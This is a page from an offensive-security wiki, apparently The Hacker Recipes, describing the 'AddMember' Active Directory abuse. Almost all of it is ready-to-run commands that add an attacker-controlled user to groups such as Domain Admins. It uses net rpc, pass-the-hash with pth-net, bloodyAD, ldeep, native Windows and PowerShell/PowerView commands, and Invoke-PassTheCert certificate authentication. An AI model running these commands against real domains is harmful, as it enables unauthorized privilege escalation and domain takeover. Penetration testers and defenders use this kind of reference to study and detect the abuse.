🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🍳 The Hacker Recipes / AddMember

AddMember

This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, Self, AllExtendedRights or Self-Membership, over the target group.

::: tabs

=== UNIX-like

It can also be achieved from UNIX-like system with net, a tool for the administration of samba and cifs/smb clients. The pth-toolkit can also be used to run net commands with pass-the-hash.

# With net and cleartext credentials (will be prompted)
net rpc group addmem "$TargetGroup" "$TargetUser" -U "$DOMAIN"/"$USER" -S "$DC_HOST"

# With net and cleartext credentials
net rpc group addmem "$TargetGroup" "$TargetUser" -U "$DOMAIN"/"$USER"%"$PASSWORD" -S "$DC_HOST"

# With Pass-the-Hash
pth-net rpc group addmem "$TargetGroup" "$TargetUser" -U "$DOMAIN"/"$USER"%"ffffffffffffffffffffffffffffffff":"$NT_HASH" -S "$DC_HOST"

Alternative 1: Using bloodyAD

bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add groupMember "$TargetGroup" "$TargetUser"

Alternative 2: Using ldeep (Python)

[!NOTE] NOTE
Use dn format for $TargetUser and $TargetGroup

ldeep ldap -d "$DOMAIN" -s "$DC_IP" -u "$USER" -p "$PASSWORD" add_to_group "$TargetUser" "$TargetGroup"

=== Windows

The attacker can add a user/group/computer to a group. This can be achieved with a native command line, with the Active Directory PowerShell module, or with Add-DomainGroupMember (PowerView module).

# Command line
net group 'Domain Admins' 'user' /add /domain

# Powershell: Active Directory module
Add-ADGroupMember -Identity 'Domain Admins' -Members 'user'

# Powershell: PowerSploit module
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'user'

The Invoke-PassTheCert fork can also be used, authenticating through Schannel via PassTheCert (PowerShell version).

Note: the README contains the methodology to request a certificate using certreq from Windows (with a password, or an NTHash).

# Import the PowerShell script and show its manual
Import-Module .\Invoke-PassTheCert.ps1
.\Invoke-PassTheCert.ps1 -?
# Authenticate to LDAP/S
$LdapConnection = Invoke-PassTheCert-GetLDAPConnectionInstance -Server 'LDAP_IP' -Port 636 -Certificate cert.pfx
# List all the available actions
Invoke-PassTheCert -a -NoBanner

# Adds the member 'Kinda KU. USY' into the group 'Domain Admins'
Invoke-PassTheCert -Action 'AddGroupMember' -LdapConnection $LdapConnection -Identity 'CN=Kinda KU. USY,CN=Users,DC=X' -GroupDN 'CN=Domain Admins,CN=Users,DC=X'

:::